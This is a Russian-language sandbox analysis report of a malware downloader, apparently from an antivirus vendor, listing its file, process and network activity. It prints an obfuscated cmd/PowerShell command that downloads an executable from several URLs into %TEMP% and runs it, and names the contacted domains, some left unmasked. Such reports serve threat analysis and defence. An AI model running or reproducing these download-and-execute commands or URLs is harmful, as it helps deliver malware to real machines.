Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V/C"set 1Rh=;'jTt'=Zwo$}}{hctac}};kaerb;'KfJ'=wqV$;nsH$ metI-ekovnI{ )00008 eg- htgnel.)nsH$ metI-teG(( fI;'SXV'=GMB$;)nsH$ ,MvR$(eliFdaolnwoD.Bkp${yrt{)WlV$ ni MvR$(hcaerof;'exe.'+PVH$+'\'+pm...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\849.exe
Удаляет следующие файлы
- %TEMP%\849.exe
Сетевая активность
Подключается к
- 'ca###liia.com':80
- 'tr##on.fi':80
- 'in######.#hampagne-clerambault.com':80
- 'in######.#hampagne-clerambault.com':443
TCP
Запросы HTTP GET
- http://ca###liia.com/Futu3fgt
- http://www.ca###liia.com/Futu3fgt
- http://tr##on.fi/Bz4pEqDQw
- http://in######.#hampagne-clerambault.com/NjmYMSA
Другие
- 'in######.#hampagne-clerambault.com':443
UDP
- DNS ASK tu##rg.com
- DNS ASK ca###liia.com
- DNS ASK tr##on.fi
- DNS ASK in######.#hampagne-clerambault.com
- DNS ASK te#####stiopenedes.es
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set 1Rh=;'jTt'=Zwo$}}{hctac}};kaerb;'KfJ'=wqV$;nsH$ metI-ekovnI{ )00008 eg- htgnel.)nsH$ metI-teG(( fI;'SXV'=GMB$;)nsH$ ,MvR$(eliFdaolnwoD.Bkp${yrt{)WlV$ ni MvR$(hcaerof;'exe.'+PVH$+'\'+pm...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $csM='fKu';$pkB=new-object Net.WebClient;$VlW='http://tu##rg.com/eygUEU2A9@http://camelliia.com/Futu3fgt@http://triton.fi/Bz4pEqDQw@http://intranet.champagne-clerambau...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =fKu
